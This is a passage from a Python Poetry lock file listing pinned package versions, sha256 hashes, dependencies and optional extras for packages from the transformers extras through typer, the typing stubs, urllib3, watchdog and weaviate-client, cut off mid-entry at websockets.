"protobuf", "pyctcdecode (>=0.4.0)", "ray[tune]", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx", "timm", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "torchaudio", "torchvision"] audio = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"] codecarbon = ["codecarbon (==1.2.0)"] deepspeed = ["accelerate (>=0.20.3)", "deepspeed (>=0.9.3)"] deepspeed-testing = ["GitPython (<3.1.19)", "accelerate (>=0.20.3)", "beautifulsoup4", "black (>=23.1,<24.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "deepspeed (>=0.9.3)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "hf-doc-builder (>=0.3.0)", "nltk", "optuna", "parameterized", "protobuf", "psutil", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "sentencepiece (>=0.1.91,!=0.1.92)", "timeout-decorator"] dev = ["GitPython (<3.1.19)", "Pillow (<10.0.0)", "accelerate (>=0.20.3)", "av (==9.2.0)", "beautifulsoup4", "black (>=23.1,<24.0)", "codecarbon (==1.2.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "decord (==0.6.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "flax (>=0.4.1,<=0.7.0)", "fugashi (>=1.0)", "hf-doc-builder", "hf-doc-builder (>=0.3.0)", "ipadic (>=1.0.0,<2.0)", "isort (>=5.5.4)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "kenlm", "keras-nlp (>=0.3.1)", "librosa", "nltk", "onnxconverter-common", "optax (>=0.0.8,<=0.1.4)", "optuna", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "ray[tune]", "rhoknp (>=1.1.0,<1.3.1)", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (>=0.0.241,<=0.0.259)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx", "timeout-decorator", "timm", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "torchaudio", "torchvision", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)", "urllib3 (<2.0.0)"] dev-tensorflow = ["GitPython (<3.1.19)", "Pillow (<10.0.0)", "beautifulsoup4", "black (>=23.1,<24.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "hf-doc-builder", "hf-doc-builder (>=0.3.0)", "isort (>=5.5.4)", "kenlm", "keras-nlp (>=0.3.1)", "librosa", "nltk", "onnxconverter-common", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (>=0.0.241,<=0.0.259)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", "sentencepiece (>=0.1.91,!=0.1.92)", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx", "timeout-decorator", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "urllib3 (<2.0.0)"] dev-torch = ["GitPython (<3.1.19)", "Pillow (<10.0.0)", "accelerate (>=0.20.3)", "beautifulsoup4", "black (>=23.1,<24.0)", "codecarbon (==1.2.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "fugashi (>=1.0)", "hf-doc-builder", "hf-doc-builder (>=0.3.0)", "ipadic (>=1.0.0,<2.0)", "isort (>=5.5.4)", "kenlm", "librosa", "nltk", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "optuna", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "ray[tune]", "rhoknp (>=1.1.0,<1.3.1)", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (>=0.0.241,<=0.0.259)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "timeout-decorator", "timm", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "torchaudio", "torchvision", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)", "urllib3 (<2.0.0)"] docs = ["Pillow (<10.0.0)", "accelerate (>=0.20.3)", "av (==9.2.0)", "codecarbon (==1.2.0)", "decord (==0.6.0)", "flax (>=0.4.1,<=0.7.0)", "hf-doc-builder", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "kenlm", "keras-nlp (>=0.3.1)", "librosa", "onnxconverter-common", "optax (>=0.0.8,<=0.1.4)", "optuna", "phonemizer", "protobuf", "pyctcdecode (>=0.4.0)", "ray[tune]", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx", "timm", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "torchaudio", "torchvision"] docs-specific = ["hf-doc-builder"] fairscale = ["fairscale (>0.3)"] flax = ["flax (>=0.4.1,<=0.7.0)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "optax (>=0.0.8,<=0.1.4)"] flax-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"] ftfy = ["ftfy"] integrations = ["optuna", "ray[tune]", "sigopt"] ja = ["fugashi (>=1.0)", "ipadic (>=1.0.0,<2.0)", "rhoknp (>=1.1.0,<1.3.1)", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)"] modelcreation = ["cookiecutter (==1.7.3)"] natten = ["natten (>=0.14.6)"] onnx = ["onnxconverter-common", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "tf2onnx"] onnxruntime = ["onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)"] optuna = ["optuna"] quality = ["GitPython (<3.1.19)", "black (>=23.1,<24.0)", "datasets (!=2.5.0)", "hf-doc-builder (>=0.3.0)", "isort (>=5.5.4)", "ruff (>=0.0.241,<=0.0.259)", "urllib3 (<2.0.0)"] ray = ["ray[tune]"] retrieval = ["datasets (!=2.5.0)", "faiss-cpu"] sagemaker = ["sagemaker (>=2.31.0)"] sentencepiece = ["protobuf", "sentencepiece (>=0.1.91,!=0.1.92)"] serving = ["fastapi", "pydantic (<2)", "starlette", "uvicorn"] sigopt = ["sigopt"] sklearn = ["scikit-learn"] speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)", "torchaudio"] testing = ["GitPython (<3.1.19)", "beautifulsoup4", "black (>=23.1,<24.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "hf-doc-builder (>=0.3.0)", "nltk", "parameterized", "protobuf", "psutil", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "timeout-decorator"] tf = ["keras-nlp (>=0.3.1)", "onnxconverter-common", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx"] tf-cpu = ["keras-nlp (>=0.3.1)", "onnxconverter-common", "tensorflow-cpu (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx"] tf-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"] timm = ["timm"] tokenizers = ["tokenizers (>=0.11.1,!=0.11.3,<0.14)"] torch = ["accelerate (>=0.20.3)", "torch (>=1.10,!=1.12.0)"] torch-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)", "torchaudio"] torch-vision = ["Pillow (<10.0.0)", "torchvision"] torchhub = ["filelock", "huggingface-hub (>=0.15.1,<1.0)", "importlib-metadata", "numpy (>=1.17)", "packaging (>=20.0)", "protobuf", "regex (!=2019.12.17)", "requests", "sentencepiece (>=0.1.91,!=0.1.92)", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "tqdm (>=4.27)"] video = ["av (==9.2.0)", "decord (==0.6.0)"] vision = ["Pillow (<10.0.0)"] [[package]] name = "typer" version = "0.9.0" description = "Typer, build great CLIs. Easy to code. Based on Python type hints." optional = true python-versions = ">=3.6" files = [ {file = "typer-0.9.0-py3-none-any.whl", hash = "sha256:5d96d986a21493606a358cae4461bd8cdf83cbf33a5aa950ae629ca3b51467ee"}, {file = "typer-0.9.0.tar.gz", hash = "sha256:50922fd79aea2f4751a8e0408ff10d2662bd0c8bbfa84755a699f3bada2978b2"}, ] [package.dependencies] click = ">=7.1.1,<9.0.0" typing-extensions = ">=3.7.4.3" [package.extras] all = ["colorama (>=0.4.3,<0.5.0)", "rich (>=10.11.0,<14.0.0)", "shellingham (>=1.3.0,<2.0.0)"] dev = ["autoflake (>=1.3.1,<2.0.0)", "flake8 (>=3.8.3,<4.0.0)", "pre-commit (>=2.17.0,<3.0.0)"] doc = ["cairosvg (>=2.5.2,<3.0.0)", "mdx-include (>=1.4.1,<2.0.0)", "mkdocs (>=1.1.2,<2.0.0)", "mkdocs-material (>=8.1.4,<9.0.0)", "pillow (>=9.3.0,<10.0.0)"] test = ["black (>=22.3.0,<23.0.0)", "coverage (>=6.2,<7.0)", "isort (>=5.0.6,<6.0.0)", "mypy (==0.910)", "pytest (>=4.4.0,<8.0.0)", "pytest-cov (>=2.10.0,<5.0.0)", "pytest-sugar (>=0.9.4,<0.10.0)", "pytest-xdist (>=1.32.0,<4.0.0)", "rich (>=10.11.0,<14.0.0)", "shellingham (>=1.3.0,<2.0.0)"] [[package]] name = "types-chardet" version = "5.0.4.6" description = "Typing stubs for chardet" optional = false python-versions = "*" files = [ {file = "types-chardet-5.0.4.6.tar.gz", hash = "sha256:caf4c74cd13ccfd8b3313c314aba943b159de562a2573ed03137402b2bb37818"}, {file = "types_chardet-5.0.4.6-py3-none-any.whl", hash = "sha256:ea832d87e798abf1e4dfc73767807c2b7fee35d0003ae90348aea4ae00fb004d"}, ] [[package]] name = "types-protobuf" version = "4.24.0.3" description = "Typing stubs for protobuf" optional = false python-versions = ">=3.7" files = [ {file = "types-protobuf-4.24.0.3.tar.gz", hash = "sha256:048ca006a08ac0563ff04a86ddcdda6f8877b024f5ff89ed6180510b017c3a91"}, {file = "types_protobuf-4.24.0.3-py3-none-any.whl", hash = "sha256:6652be32c647a855cd9c01e6c556ecdc94988188c4de89942ad13e906537aaee"}, ] [[package]] name = "types-pyopenssl" version = "23.2.0.2" description = "Typing stubs for pyOpenSSL" optional = false python-versions = "*" files = [ {file = "types-pyOpenSSL-23.2.0.2.tar.gz", hash = "sha256:6a010dac9ecd42b582d7dd2cc3e9e40486b79b3b64bb2fffba1474ff96af906d"}, {file = "types_pyOpenSSL-23.2.0.2-py3-none-any.whl", hash = "sha256:19536aa3debfbe25a918cf0d898e9f5fbbe6f3594a429da7914bf331deb1b342"}, ] [package.dependencies] cryptography = ">=35.0.0" [[package]] name = "types-python-dateutil" version = "2.8.19.14" description = "Typing stubs for python-dateutil" optional = false python-versions = "*" files = [ {file = "types-python-dateutil-2.8.19.14.tar.gz", hash = "sha256:1f4f10ac98bb8b16ade9dbee3518d9ace017821d94b057a425b069f834737f4b"}, {file = "types_python_dateutil-2.8.19.14-py3-none-any.whl", hash = "sha256:f977b8de27787639986b4e28963263fd0e5158942b3ecef91b9335c130cb1ce9"}, ] [[package]] name = "types-pytz" version = "2023.3.1.1" description = "Typing stubs for pytz" optional = false python-versions = "*" files = [ {file = "types-pytz-2023.3.1.1.tar.gz", hash = "sha256:cc23d0192cd49c8f6bba44ee0c81e4586a8f30204970fc0894d209a6b08dab9a"}, {file = "types_pytz-2023.3.1.1-py3-none-any.whl", hash = "sha256:1999a123a3dc0e39a2ef6d19f3f8584211de9e6a77fe7a0259f04a524e90a5cf"}, ] [[package]] name = "types-pyyaml" version = "6.0.12.12" description = "Typing stubs for PyYAML" optional = false python-versions = "*" files = [ {file = "types-PyYAML-6.0.12.12.tar.gz", hash = "sha256:334373d392fde0fdf95af5c3f1661885fa10c52167b14593eb856289e1855062"}, {file = "types_PyYAML-6.0.12.12-py3-none-any.whl", hash = "sha256:c05bc6c158facb0676674b7f11fe3960db4f389718e19e62bd2b84d6205cfd24"}, ] [[package]] name = "types-redis" version = "4.6.0.8" description = "Typing stubs for redis" optional = false python-versions = ">=3.7" files = [ {file = "types-redis-4.6.0.8.tar.gz", hash = "sha256:1abb2859bbf9b171a22ef69d1ece0e35ef93e642fba97538497add884ad75b5e"}, {file = "types_redis-4.6.0.8-py3-none-any.whl", hash = "sha256:4839923b4cce77bbf987290ca83710f8218529eebe1d2c3a0f067416c86847f5"}, ] [package.dependencies] cryptography = ">=35.0.0" types-pyOpenSSL = "*" [[package]] name = "types-requests" version = "2.31.0.6" description = "Typing stubs for requests" optional = false python-versions = ">=3.7" files = [ {file = "types-requests-2.31.0.6.tar.gz", hash = "sha256:cd74ce3b53c461f1228a9b783929ac73a666658f223e28ed29753771477b3bd0"}, {file = "types_requests-2.31.0.6-py3-none-any.whl", hash = "sha256:a2db9cb228a81da8348b49ad6db3f5519452dd20a9c1e1a868c83c5fe88fd1a9"}, ] [package.dependencies] types-urllib3 = "*" [[package]] name = "types-toml" version = "0.10.8.7" description = "Typing stubs for toml" optional = false python-versions = "*" files = [ {file = "types-toml-0.10.8.7.tar.gz", hash = "sha256:58b0781c681e671ff0b5c0319309910689f4ab40e8a2431e205d70c94bb6efb1"}, {file = "types_toml-0.10.8.7-py3-none-any.whl", hash = "sha256:61951da6ad410794c97bec035d59376ce1cbf4453dc9b6f90477e81e4442d631"}, ] [[package]] name = "types-urllib3" version = "1.26.25.14" description = "Typing stubs for urllib3" optional = false python-versions = "*" files = [ {file = "types-urllib3-1.26.25.14.tar.gz", hash = "sha256:229b7f577c951b8c1b92c1bc2b2fdb0b49847bd2af6d1cc2a2e3dd340f3bda8f"}, {file = "types_urllib3-1.26.25.14-py3-none-any.whl", hash = "sha256:9683bbb7fb72e32bfe9d2be6e04875fbe1b3eeec3cbb4ea231435aa7fd6b4f0e"}, ] [[package]] name = "typing-extensions" version = "4.8.0" description = "Backported and Experimental Type Hints for Python 3.8+" optional = false python-versions = ">=3.8" files = [ {file = "typing_extensions-4.8.0-py3-none-any.whl", hash = "sha256:8f92fc8806f9a6b641eaa5318da32b44d401efaac0f6678c9bc448ba3605faa0"}, {file = "typing_extensions-4.8.0.tar.gz", hash = "sha256:df8e4339e9cb77357558cbdbceca33c303714cf861d1eef15e1070055ae8b7ef"}, ] [[package]] name = "typing-inspect" version = "0.9.0" description = "Runtime inspection utilities for typing module." optional = false python-versions = "*" files = [ {file = "typing_inspect-0.9.0-py3-none-any.whl", hash = "sha256:9ee6fc59062311ef8547596ab6b955e1b8aa46242d854bfc78f4f6b0eff35f9f"}, {file = "typing_inspect-0.9.0.tar.gz", hash = "sha256:b23fc42ff6f6ef6954e4852c1fb512cdd18dbea03134f91f856a95ccc9461f78"}, ] [package.dependencies] mypy-extensions = ">=0.3.0" typing-extensions = ">=3.7.4" [[package]] name = "tzdata" version = "2023.3" description = "Provider of IANA time zone data" optional = false python-versions = ">=2" files = [ {file = "tzdata-2023.3-py2.py3-none-any.whl", hash = "sha256:7e65763eef3120314099b6939b5546db7adce1e7d6f2e179e3df563c70511eda"}, {file = "tzdata-2023.3.tar.gz", hash = "sha256:11ef1e08e54acb0d4f95bdb1be05da659673de4acbd21bf9c69e94cc5e907a3a"}, ] [[package]] name = "tzlocal" version = "4.3.1" description = "tzinfo object for the local timezone" optional = true python-versions = ">=3.7" files = [ {file = "tzlocal-4.3.1-py3-none-any.whl", hash = "sha256:67d7e7f4ce0a98e9dfde2e02474c60fe846ed032d78b555c554c2e9cba472d84"}, {file = "tzlocal-4.3.1.tar.gz", hash = "sha256:ee32ef8c20803c19a96ed366addd3d4a729ef6309cb5c7359a0cc2eeeb7fa46a"}, ] [package.dependencies] "backports.zoneinfo" = {version = "*", markers = "python_version < \"3.9\""} pytz-deprecation-shim = "*" tzdata = {version = "*", markers = "platform_system == \"Windows\""} [package.extras] devenv = ["black", "check-manifest", "flake8", "pyroma", "pytest (>=4.3)", "pytest-cov", "pytest-mock (>=3.3)", "zest.releaser"] [[package]] name = "upstash-redis" version = "0.15.0" description = "Serverless Redis SDK from Upstash" optional = true python-versions = ">=3.8,<4.0" files = [ {file = "upstash_redis-0.15.0-py3-none-any.whl", hash = "sha256:4a89913cb2bb2422610bc2a9c8d6b9a9d75d0674c22c5ea8037d35d343ee5846"}, {file = "upstash_redis-0.15.0.tar.gz", hash = "sha256:910f6a567142167b742c38efecfabf23f47e24fcbddb00a6b5845cb11064c3af"}, ] [package.dependencies] aiohttp = ">=3.8.4,<4.0.0" requests = ">=2.31.0,<3.0.0" [[package]] name = "uri-template" version = "1.3.0" description = "RFC 6570 URI Template Processor" optional = false python-versions = ">=3.7" files = [ {file = "uri-template-1.3.0.tar.gz", hash = "sha256:0e00f8eb65e18c7de20d595a14336e9f337ead580c70934141624b6d1ffdacc7"}, {file = "uri_template-1.3.0-py3-none-any.whl", hash = "sha256:a44a133ea12d44a0c0f06d7d42a52d71282e77e2f937d8abd5655b8d56fc1363"}, ] [package.extras] dev = ["flake8", "flake8-annotations", "flake8-bandit", "flake8-bugbear", "flake8-commas", "flake8-comprehensions", "flake8-continuation", "flake8-datetimez", "flake8-docstrings", "flake8-import-order", "flake8-literal", "flake8-modern-annotations", "flake8-noqa", "flake8-pyproject", "flake8-requirements", "flake8-typechecking-import", "flake8-use-fstring", "mypy", "pep8-naming", "types-PyYAML"] [[package]] name = "uritemplate" version = "4.1.1" description = "Implementation of RFC 6570 URI Templates" optional = true python-versions = ">=3.6" files = [ {file = "uritemplate-4.1.1-py2.py3-none-any.whl", hash = "sha256:830c08b8d99bdd312ea4ead05994a38e8936266f84b9a7878232db50b044e02e"}, {file = "uritemplate-4.1.1.tar.gz", hash = "sha256:4346edfc5c3b79f694bccd6d6099a322bbeb628dbf2cd86eea55a456ce5124f0"}, ] [[package]] name = "urllib3" version = "1.26.18" description = "HTTP library with thread-safe connection pooling, file post, and more." optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*" files = [ {file = "urllib3-1.26.18-py2.py3-none-any.whl", hash = "sha256:34b97092d7e0a3a8cf7cd10e386f401b3737364026c45e622aa02903dffe0f07"}, {file = "urllib3-1.26.18.tar.gz", hash = "sha256:f8ecc1bba5667413457c529ab955bf8c67b45db799d159066261719e328580a0"}, ] [package.extras] brotli = ["brotli (==1.0.9)", "brotli (>=1.0.9)", "brotlicffi (>=0.8.0)", "brotlipy (>=0.6.0)"] secure = ["certifi", "cryptography (>=1.3.4)", "idna (>=2.0.0)", "ipaddress", "pyOpenSSL (>=0.14)", "urllib3-secure-extra"] socks = ["PySocks (>=1.5.6,!=1.5.7,<2.0)"] [[package]] name = "validators" version = "0.22.0" description = "Python Data Validation for Humans™" optional = true python-versions = ">=3.8" files = [ {file = "validators-0.22.0-py3-none-any.whl", hash = "sha256:61cf7d4a62bbae559f2e54aed3b000cea9ff3e2fdbe463f51179b92c58c9585a"}, {file = "validators-0.22.0.tar.gz", hash = "sha256:77b2689b172eeeb600d9605ab86194641670cdb73b60afd577142a9397873370"}, ] [package.extras] docs-offline = ["myst-parser (>=2.0.0)", "pypandoc-binary (>=1.11)", "sphinx (>=7.1.1)"] docs-online = ["mkdocs (>=1.5.2)", "mkdocs-git-revision-date-localized-plugin (>=1.2.0)", "mkdocs-material (>=9.2.6)", "mkdocstrings[python] (>=0.22.0)", "pyaml (>=23.7.0)"] hooks = ["pre-commit (>=3.3.3)"] package = ["build (>=1.0.0)", "twine (>=4.0.2)"] runner = ["tox (>=4.11.1)"] sast = ["bandit[toml] (>=1.7.5)"] testing = ["pytest (>=7.4.0)"] tooling = ["black (>=23.7.0)", "pyright (>=1.1.325)", "ruff (>=0.0.287)"] tooling-extras = ["pyaml (>=23.7.0)", "pypandoc-binary (>=1.11)", "pytest (>=7.4.0)"] [[package]] name = "vcrpy" version = "5.1.0" description = "Automatically mock your HTTP interactions to simplify and speed up testing" optional = false python-versions = ">=3.8" files = [ {file = "vcrpy-5.1.0-py2.py3-none-any.whl", hash = "sha256:605e7b7a63dcd940db1df3ab2697ca7faf0e835c0852882142bafb19649d599e"}, {file = "vcrpy-5.1.0.tar.gz", hash = "sha256:bbf1532f2618a04f11bce2a99af3a9647a32c880957293ff91e0a5f187b6b3d2"}, ] [package.dependencies] PyYAML = "*" urllib3 = {version = "<2", markers = "python_version < \"3.10\""} wrapt = "*" yarl = "*" [[package]] name = "watchdog" version = "3.0.0" description = "Filesystem events monitoring" optional = false python-versions = ">=3.7" files = [ {file = "watchdog-3.0.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:336adfc6f5cc4e037d52db31194f7581ff744b67382eb6021c868322e32eef41"}, {file = "watchdog-3.0.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:a70a8dcde91be523c35b2bf96196edc5730edb347e374c7de7cd20c43ed95397"}, {file = "watchdog-3.0.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:adfdeab2da79ea2f76f87eb42a3ab1966a5313e5a69a0213a3cc06ef692b0e96"}, {file = "watchdog-3.0.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:2b57a1e730af3156d13b7fdddfc23dea6487fceca29fc75c5a868beed29177ae"}, {file = "watchdog-3.0.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:7ade88d0d778b1b222adebcc0927428f883db07017618a5e684fd03b83342bd9"}, {file = "watchdog-3.0.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:7e447d172af52ad204d19982739aa2346245cc5ba6f579d16dac4bfec226d2e7"}, {file = "watchdog-3.0.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:9fac43a7466eb73e64a9940ac9ed6369baa39b3bf221ae23493a9ec4d0022674"}, {file = "watchdog-3.0.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:8ae9cda41fa114e28faf86cb137d751a17ffd0316d1c34ccf2235e8a84365c7f"}, {file = "watchdog-3.0.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:25f70b4aa53bd743729c7475d7ec41093a580528b100e9a8c5b5efe8899592fc"}, {file = "watchdog-3.0.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4f94069eb16657d2c6faada4624c39464f65c05606af50bb7902e036e3219be3"}, {file = "watchdog-3.0.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:7c5f84b5194c24dd573fa6472685b2a27cc5a17fe5f7b6fd40345378ca6812e3"}, {file = "watchdog-3.0.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:3aa7f6a12e831ddfe78cdd4f8996af9cf334fd6346531b16cec61c3b3c0d8da0"}, {file = "watchdog-3.0.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:233b5817932685d39a7896b1090353fc8efc1ef99c9c054e46c8002561252fb8"}, {file = "watchdog-3.0.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:13bbbb462ee42ec3c5723e1205be8ced776f05b100e4737518c67c8325cf6100"}, {file = "watchdog-3.0.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:8f3ceecd20d71067c7fd4c9e832d4e22584318983cabc013dbf3f70ea95de346"}, {file = "watchdog-3.0.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:c9d8c8ec7efb887333cf71e328e39cffbf771d8f8f95d308ea4125bf5f90ba64"}, {file = "watchdog-3.0.0-py3-none-manylinux2014_aarch64.whl", hash = "sha256:0e06ab8858a76e1219e68c7573dfeba9dd1c0219476c5a44d5333b01d7e1743a"}, {file = "watchdog-3.0.0-py3-none-manylinux2014_armv7l.whl", hash = "sha256:d00e6be486affb5781468457b21a6cbe848c33ef43f9ea4a73b4882e5f188a44"}, {file = "watchdog-3.0.0-py3-none-manylinux2014_i686.whl", hash = "sha256:c07253088265c363d1ddf4b3cdb808d59a0468ecd017770ed716991620b8f77a"}, {file = "watchdog-3.0.0-py3-none-manylinux2014_ppc64.whl", hash = "sha256:5113334cf8cf0ac8cd45e1f8309a603291b614191c9add34d33075727a967709"}, {file = "watchdog-3.0.0-py3-none-manylinux2014_ppc64le.whl", hash = "sha256:51f90f73b4697bac9c9a78394c3acbbd331ccd3655c11be1a15ae6fe289a8c83"}, {file = "watchdog-3.0.0-py3-none-manylinux2014_s390x.whl", hash = "sha256:ba07e92756c97e3aca0912b5cbc4e5ad802f4557212788e72a72a47ff376950d"}, {file = "watchdog-3.0.0-py3-none-manylinux2014_x86_64.whl", hash = "sha256:d429c2430c93b7903914e4db9a966c7f2b068dd2ebdd2fa9b9ce094c7d459f33"}, {file = "watchdog-3.0.0-py3-none-win32.whl", hash = "sha256:3ed7c71a9dccfe838c2f0b6314ed0d9b22e77d268c67e015450a29036a81f60f"}, {file = "watchdog-3.0.0-py3-none-win_amd64.whl", hash = "sha256:4c9956d27be0bb08fc5f30d9d0179a855436e655f046d288e2bcc11adfae893c"}, {file = "watchdog-3.0.0-py3-none-win_ia64.whl", hash = "sha256:5d9f3a10e02d7371cd929b5d8f11e87d4bad890212ed3901f9b4d68767bee759"}, {file = "watchdog-3.0.0.tar.gz", hash = "sha256:4d98a320595da7a7c5a18fc48cb633c2e73cda78f93cac2ef42d42bf609a33f9"}, ] [package.extras] watchmedo = ["PyYAML (>=3.10)"] [[package]] name = "wcwidth" version = "0.2.8" description = "Measures the displayed width of unicode strings in a terminal" optional = false python-versions = "*" files = [ {file = "wcwidth-0.2.8-py2.py3-none-any.whl", hash = "sha256:77f719e01648ed600dfa5402c347481c0992263b81a027344f3e1ba25493a704"}, {file = "wcwidth-0.2.8.tar.gz", hash = "sha256:8705c569999ffbb4f6a87c6d1b80f324bd6db952f5eb0b95bc07517f4c1813d4"}, ] [[package]] name = "weaviate-client" version = "3.25.1" description = "A python native Weaviate client" optional = true python-versions = ">=3.8" files = [ {file = "weaviate-client-3.25.1.tar.gz", hash = "sha256:cfa6435e365bae734d875013124baa14cada7e36af4f2d82def5a15b44374978"}, {file = "weaviate_client-3.25.1-py3-none-any.whl", hash = "sha256:94680aff46c3ad2748a7c6530c6466c6aee6d03b5b69c0c814f987f2fdefae36"}, ] [package.dependencies] authlib = ">=1.2.1,<2.0.0" requests = ">=2.30.0,<3.0.0" validators = ">=0.21.2,<1.0.0" [package.extras] grpc = ["grpcio (>=1.57.0,<2.0.0)", "grpcio-tools (>=1.57.0,<2.0.0)"] [[package]] name = "webcolors" version = "1.13" description = "A library for working with the color formats defined by HTML and CSS." optional = false python-versions = ">=3.7" files = [ {file = "webcolors-1.13-py3-none-any.whl", hash = "sha256:29bc7e8752c0a1bd4a1f03c14d6e6a72e93d82193738fa860cbff59d0fcc11bf"}, {file = "webcolors-1.13.tar.gz", hash = "sha256:c225b674c83fa923be93d235330ce0300373d02885cef23238813b0d5668304a"}, ] [package.extras] docs = ["furo", "sphinx", "sphinx-copybutton", "sphinx-inline-tabs", "sphinx-notfound-page", "sphinxext-opengraph"] tests = ["pytest", "pytest-cov"] [[package]] name = "webencodings" version = "0.5.1" description = "Character encoding aliases for legacy web content" optional = false python-versions = "*" files = [ {file = "webencodings-0.5.1-py2.py3-none-any.whl", hash = "sha256:a0af1213f3c2226497a97e2b3aa01a7e4bee4f403f95be16fc9acd2947514a78"}, {file = "webencodings-0.5.1.tar.gz", hash = "sha256:b36a1c245f2d304965eb4e0a82848379241dc04b865afcc4aab16748587e1923"}, ] [[package]] name = "websocket-client" version = "1.6.4" description = "WebSocket client for Python with low level API options" optional = false python-versions = ">=3.8" files = [ {file = "websocket-client-1.6.4.tar.gz", hash = "sha256:b3324019b3c28572086c4a319f91d1dcd44e6e11cd340232978c684a7650d0df"}, {file = "websocket_client-1.6.4-py3-none-any.whl", hash = "sha256:084072e0a7f5f347ef2ac3d8698a5e0b4ffbfcab607628cadabc650fc9a83a24"}, ] [package.extras] docs = ["Sphinx (>=6.0)", "sphinx-rtd-theme (>=1.1.0)"] optional = ["python-socks", "wsaccel"] test = ["websockets"] [[package]] name = "websockets" version = "12.0" description = "An implementation of the WebSocket Protocol (RFC 6455 & 7692)" optional = true python-versions = ">=3.8" files = [ {file = 